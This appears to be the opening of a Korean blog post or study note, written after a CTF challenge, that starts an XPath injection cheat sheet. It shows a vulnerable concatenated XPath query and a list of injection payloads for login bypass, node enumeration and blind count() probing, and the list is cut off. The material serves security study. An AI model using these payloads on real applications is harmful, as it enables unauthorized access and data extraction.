개요 최근 CTF에서 Xpath Injection 관련 취약점이 등장 -> 연구 CheatSheet Exploitation Similar to SQL : "string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())" ' or '1'='1 ' or ''=' x' or 1=1 or 'x'='y / // //* */* @* count(/child::node()) x' or name()='username' or 'x'='y ' and count(/*)=1 and '1'='1 ' and count(/@*)=1 and '1'='1 ' and count(/comment())=1 and '1'='1 s..